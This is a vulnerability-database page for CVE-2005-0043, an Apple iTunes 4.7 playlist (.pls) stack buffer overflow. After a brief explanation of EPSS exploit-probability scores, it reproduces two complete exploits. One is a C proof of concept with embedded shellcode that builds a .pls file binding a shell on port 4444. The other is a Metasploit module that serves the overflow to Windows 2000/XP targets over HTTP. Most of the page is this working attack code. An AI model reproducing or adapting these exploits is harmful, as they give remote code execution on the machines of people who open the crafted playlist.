CVE-2005-0043 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* * PoC for iTunes on OS X 10.3.7 * -( [email protected] )- * * Generates a .pls file, when loaded in iTunes it * binds a shell to port 4444. * Shellcode contains no \x00 or \x0a's. * * sample output: * * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls * -( fm-eyetewnz )- * -( [email protected] )- * Creating file: foo.pls. * Bindshell on port: 4444 * -[nemo@gir:~]$ open foo.pls * -[nemo@gir:~]$ nc localhost 4444 * id * uid=501(nemo) gid=501(nemo) groups=501(nemo) * * Thanks to andrewg, mercy and core. * Greetings to pulltheplug and felinemenace. * * -( need a challenge? )- * -( http://pulltheplug.org )- */ #include <stdio.h> #include <strings.h> #define BUFSIZE 1598 + 4 char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */ "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa" "\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee" "\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a" "\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba" "\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9" "\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9" "\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7" "\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93" "\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91" "\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83" "\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13" "\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83" "\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83" "\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04" "\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83" "\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3" "\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0" "\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3" "\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb"; int main(int ac, char **av) { int n,*p; unsigned char * q; char buf[BUFSIZE]; FILE *pls; int offset=0x3DA8; char playlist[] = { "[playlist]\n" "NumberOfEntries=1\n" "File1=http://" }; printf("-( fm-eyetewnz )-\n"); printf("-( [email protected] )-\n"); memset(buf,'\x60',BUFSIZE); bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack. q = buf + sizeof(buf) - 5; p = (int *)q; if(!(av[1])) { printf("usage: %s <filename (.pls)> [offset]\n",*av); exit(1); } if(av[2]) offset = atoi(av[2]); *p = (0xc0000000 - offset);// 0xbfffc258; if(!(pls = fopen(*(av+1),"w+"))) { printf("error opening file: %s.\n", *(av +1)); exit(1); } printf("Creating file: %s.\n",*(av+1)); printf("Bindshell on port: 4444\n"); fwrite(playlist,sizeof(playlist) - 1,1,pls); fwrite(buf,sizeof(buf) - 1,1,pls); fclose(pls); } // milw0rm.com [2005-01-16]

## # $Id: apple_itunes_playlist.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Apple ITunes 4.7 Playlist Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'. }, 'License' => MSF_LICENSE, 'Author' => 'MC', 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2005-0043' ], [ 'OSVDB', '12833' ], [ 'BID', '12238' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 Pro English SP4', { 'Ret' => 0x75033083 } ], [ 'Windows XP Pro English SP2', { 'Ret' => 0x77dc2063 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Jan 11 2005', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) cruft = rand(9).to_s sploit = make_nops(2545) + payload.encoded + [target.ret].pack('V') # Build the HTML content content = "[playlist]\r\n" + "NumberOfEntries=#{cruft}\r\n" content << "File#{cruft}=http://#{sploit}" print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end